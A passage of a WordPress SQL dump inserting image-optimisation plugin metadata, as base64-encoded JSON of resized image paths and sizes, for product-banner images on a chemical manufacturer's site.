RcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0yNDd4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjI2LCJpZCI6MTIxMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMzAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMzAweDY4LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0zMDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjI4LCJpZCI6MTIxMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtNDAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtNDAweDY4LmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy00MDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjMwLCJpZCI6MTIxMH1d'); 
INSERT INTO `wp_postmeta` VALUES (29694, 1208, 'wpfc_optimisation_reduction', '1514'); 
INSERT INTO `wp_postmeta` VALUES (29695, 1208, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjcuanBnIiwid2lkdGgiOjk0NSwiaGVpZ2h0Ijo2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjcuanBnIiwicmVkdWN0aW9uIjo5MzAsInRpbWUiOjE0ODM1NzQ2MzcsImlkIjoiMTIwOCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy0zNDB4NjguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTM0MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTM0MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2MzksImlkIjoxMjA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctODAweDU4LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy04MDB4NTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy04MDB4NTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjQxLCJpZCI6MTIwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTc2OHg1NS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjU1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctNzY4eDU1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctNzY4eDU1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDY0MywiaWQiOjEyMDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy0yNTB4NjguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTI1MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTI1MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2NDYsImlkIjoxMjA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMjAweDY4LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy0yMDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy0yMDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjQ4LCJpZCI6MTIwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTIyNXg2OC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMjI1eDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMjI1eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDY1MCwiaWQiOjEyMDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy01MTB4NjguanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTUxMHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTUxMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2NTIsImlkIjoxMjA4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy0xMTR4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy0xMTR4NjguanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTExNHg2OC5qcGciLCJyZWR1Y3Rpb24iOjM3NSwidGltZSI6MTQ4MzU3NDY1NCwiaWQiOjEyMDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTE2MHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTE2MHg2OC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6MTAxLCJ0aW1lIjoxNDgzNTc0NjU2LCJpZCI6MTIwOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMTgweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMTgweDY4LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUFRGRS1SRUxFQVNFLUFHRU5UUy1lMTQ3MjgzNzQxODYyNy0xODB4NjguanBnIiwicmVkdWN0aW9uIjo5OCwidGltZSI6MTQ4MzU3NDY1OCwiaWQiOjEyMDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTI0N3g2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTI0N3g2OC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMjQ3eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDY2MCwiaWQiOjEyMDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTMwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTMwMHg2OC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctMzAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDY2MiwiaWQiOjEyMDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTQwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9QVEZFLVJFTEVBU0UtQUdFTlRTLWUxNDcyODM3NDE4NjI3LTQwMHg2OC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1BURkUtUkVMRUFTRS1BR0VOVFMtZTE0NzI4Mzc0MTg2MjctNDAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDY2NSwiaWQiOjEyMDh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29696, 1205, 'wpfc_optimisation_reduction', '1665'); 
INSERT INTO `wp_postmeta` VALUES (29697, 1205, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC5qcGciLCJ3aWR0aCI6OTQ1LCJoZWlnaHQiOjY4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAuanBnIiwicmVkdWN0aW9uIjoxMDMzLCJ0aW1lIjoxNDgzNTc0NjcxLCJpZCI6IjEyMDUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTM0MHg2OC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTM0MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC0zNDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjczLCJpZCI6MTIwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC04MDB4NTguanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC04MDB4NTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtODAweDU4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDY3NiwiaWQiOjEyMDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtNzY4eDU1LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtNzY4eDU1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTc2OHg1NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2NzgsImlkIjoxMjA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTI1MHg2OC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3MzAxMjEwLTI1MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC0yNTB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjgwLCJpZCI6MTIwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC0yMDB4NjguanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzMwMTIxMC0yMDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMjAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDY4MiwiaWQiOjEyMDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMjI1eDY4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tcmVsZWFzZS1hZ2VudHMtZTE0NzI4MzczMDEyMTAtMjI1eDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLXJlbGV